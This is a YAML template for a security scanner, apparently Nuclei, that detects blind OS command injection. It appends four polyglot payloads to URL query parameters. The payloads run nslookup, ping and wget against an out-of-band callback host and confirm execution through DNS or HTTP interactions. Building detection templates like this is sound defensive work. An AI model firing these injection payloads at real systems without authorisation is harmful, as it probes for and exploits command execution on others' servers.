50 lines
1.7 KiB
YAML
50 lines
1.7 KiB
YAML
id: cmdi-blind-oast-polyglot
|
|
|
|
info:
|
|
name: Blind OS Command Injection
|
|
author: pdteam,geeknik
|
|
severity: high
|
|
description: |
|
|
Potential blind OS command injection vulnerabilities, where the application constructs OS commands using unsanitized user input.
|
|
Successful exploitation could lead to arbitrary command execution on the system.
|
|
reference:
|
|
- https://portswigger.net/research/hunting-asynchronous-vulnerabilities
|
|
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Command%20Injection/README.md
|
|
metadata:
|
|
max-request: 4
|
|
tags: cmdi,oast,dast,blind,polyglot
|
|
|
|
variables:
|
|
marker: "{{interactsh-url}}"
|
|
|
|
http:
|
|
- pre-condition:
|
|
- type: dsl
|
|
dsl:
|
|
- 'method == "GET"'
|
|
|
|
payloads:
|
|
payload:
|
|
- "&nslookup {{marker}}&'\\\"`0&nslookup {{marker}}&`'"
|
|
- "1;nslookup${IFS}{{marker}};#${IFS}';nslookup${IFS}{{marker}};#${IFS}\";nslookup${IFS}{{marker}};#${IFS}"
|
|
- "/*$(nslookup {{marker}})`nslookup {{marker}}``*/-nslookup({{marker}})-'/*$(nslookup {{marker}})`nslookup {{marker}}` #*/-nslookup({{marker}})||'\"||nslookup({{marker}})||\"/*`*/"
|
|
- "$(ping -c 1 {{marker}} | nslookup {{marker}} ; wget {{marker}} -O /dev/null)"
|
|
|
|
fuzzing:
|
|
- part: query
|
|
type: postfix
|
|
fuzz:
|
|
- "{{payload}}"
|
|
|
|
stop-at-first-match: true
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "dns"
|
|
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http"
|
|
# digest: 4a0a00473045022100dae6b9cabb8758e509dbba100f4df5f2372bdcad798fb059c701f05913f90ef202202f043730c663c513439af2ea02f13a86704c53b728b584e3ffaf148070eb9d40:922c64590222798bb761d5b6d8e72950 |